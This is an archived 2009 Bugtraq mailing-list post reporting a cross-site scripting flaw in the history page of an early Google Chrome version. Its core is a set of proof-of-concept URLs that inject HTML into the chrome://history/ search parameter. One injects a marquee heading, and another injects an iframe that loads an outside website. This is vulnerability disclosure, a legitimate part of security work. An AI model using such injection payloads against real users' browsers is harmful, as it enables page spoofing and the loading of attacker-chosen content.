[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

cross site scripting the browser google "chrome"

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: cross site scripting the browser google "chrome"
From: biko linux <bikolinux@xxxxxxxxx>
Date: Mon, 27 Jul 2009 13:33:44 -0600

autor :         bikolinux
Vuln:           cross site scripting the browser google "chrome"
Download:       http://www.google.com/chrome
error           local
EMAIL           MSG@xxxxxxxxxxxxx bikolinux@xxxxxxxxx
vercion test  2.0.172.37
#######################################################################################
cross site scripting the browser google "chrome"
The error is when making a request to record
#######################################################################################
path = chrome://history/
path = view-source:chrome://history/

The error is in the form

EXAMPLE
chrome://history/#q=%22%3E%3Cmarquee%3E%3Ch1%3Ebikolinux%3C%2Fh1%3E%3C%2Fmarquee%3E
view-source:chrome://history/#q="><marquee><h1>bikolinux</h1></marquee>
chrome://history/#q=%22'%3E%3Ciframe%20src%3D%22http%3A%2F%2Fmalandrines.Net%22%20height%3D%221024%22%20width%3D%22800%22%3E%3C%2Fiframe%3E



-- 
bikolinux allowed

Follow-Ups:
- Fwd: cross site scripting the browser google "chrome"
  - From: Karn Ganeshen

Prev by Date: computer crime statistics
Next by Date: RE: computer crime statistics
Previous by thread: RE: computer crime statistics
Next by thread: Fwd: cross site scripting the browser google "chrome"
Index(es):
- Date
- Thread